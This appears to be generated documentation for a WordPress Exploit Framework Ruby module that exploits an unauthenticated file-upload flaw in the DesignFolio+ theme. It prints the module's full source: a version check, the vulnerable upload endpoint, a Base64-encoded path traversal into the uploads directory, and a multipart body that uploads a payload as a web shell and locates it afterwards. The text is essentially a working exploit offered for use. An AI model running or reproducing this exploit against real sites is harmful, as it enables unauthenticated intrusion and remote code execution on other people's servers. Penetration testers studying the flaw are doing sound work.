class Wpxf::Exploit::DesignfolioPlusShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 8 def initialize super update_info( name: 'DesignFolio+ Theme Unauthenticated Shell Upload', author: [ 'CrashBandicot', # Vulnerability disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '7880'], ['EDB', '36372'] ], date: 'Mar 04 2015' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 25 def check check_theme_version_from_readme('designfolio-plus') end
encoded_relative_path_to_uploads()
click to toggle source
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 33 def encoded_relative_path_to_uploads Base64.strict_encode64('../../../uploads') end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 37 def payload_body_builder target_ip = IPSocket.getaddress(target_host) field_name = Utility::Text.md5(target_ip) builder = Utility::BodyBuilder.new builder.add_file_from_string(field_name, payload.encoded, payload_name) builder.add_field('upload_path', encoded_relative_path_to_uploads) builder end
uploaded_payload_location()
click to toggle source
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 47 def uploaded_payload_location normalize_uri(wordpress_url_uploads, payload_name.downcase) end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb, line 29 def uploader_url normalize_uri(wordpress_url_themes, 'designfolio-plus', 'admin', 'upload-file.php') end